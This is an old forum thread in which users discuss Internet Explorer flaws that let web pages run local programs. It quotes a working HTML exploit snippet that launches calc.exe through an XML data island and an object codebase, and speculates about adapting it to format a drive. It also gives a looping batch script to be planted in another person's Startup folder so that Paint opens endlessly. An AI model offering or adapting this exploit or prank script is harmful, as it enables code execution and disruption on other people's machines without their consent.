Fun little IE exploit.

[CommonSense]

Check this one out.

http://www.liquidwd.freeserve.co.uk/

It opens a new command prompt window.  I don't know if this is old news or what, and I was too lazy to go upstairs to the one token Windows box to see it work (I'm an OS X user, after all).  Looks like there's great potential for trouble with a little creative tweaking of the source of this page . . .

[voidmain]

Yes, I was aware of that one for a month or two now, and apparently it's been a problem for a very long time, but just recently made public.  Yep, wouldn't take much to wipe out a hard drive just by browsing to the wrong site...

[Bateluer]

Lucky I don't use IE unless I am forced to  

edit - It does not open the cmd.exe in Opera 6.01  

[ March 05, 2002: Message edited by: Bateleur ]

[voidmain]

Holy Shit!  I clicked that link on my RedHat box and it fired up a copy of VMware running Windows 2000, then opened up a command prompt.  After it did that it opened up kdevelop and finished that KDE application for me that I've been working on.

[Bateluer]

lol!

[jtpenrod]

Or how about this one fromThe Register

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

Just copy that into any text editor, save as a *.html file and open it with IE. According to the article, this will launch the calculator program. Macro$uck doesn't have a patch for this (so what else did you expect?   :eek:  ) There is a way to get around this, but the cure sounds almost as bad as the disease. I don't suppose it would be too much trouble to get that to do, let's say, format c:    ?

Yet another Stupid Windows Trick from the Trustworthy Computing Co.              

[Druid]

Doesn't work for me.
Win2k, IE6

The path "c:/windows/ system32/calc.exe" is valid, btw

Druid

[voidmain]

Druid, do you think you can get your money back?  Sounds like your copy of Windows isn't working properly.  

[ March 07, 2002: Message edited by: VoidMain ]

[tallwookie2]

hmm... running win 98 se... that "command line" easter egg or whatever didnt do a damned thing... luv the site btw!

-tallwookie2

[phill]

Win2K, IE6, don't do anything here  :confused:    

[dirtydog]

Not a thing here ! Win 98 SE    

[Bateluer]

How would you write a script to open say 5000 instances of Paint? I want to piss off some MS-Man whores  

[voidmain]

Create a batch file called m$paint.bat and add it to his Startup folder with the following:

@echo off
:hell
echo Microsoft $ucks!!
start pbrush
goto hell

[ March 10, 2002: Message edited by: VoidMain ]

[Bateluer]

I don't have physical access to their machines  

[Druid]

Originally posted by VoidMain:
[QB]Druid, do you think you can get your money back?  Sounds like your copy of Windows isn't working properly.      

Of course it isn't working properly, that's how it was designed

Druid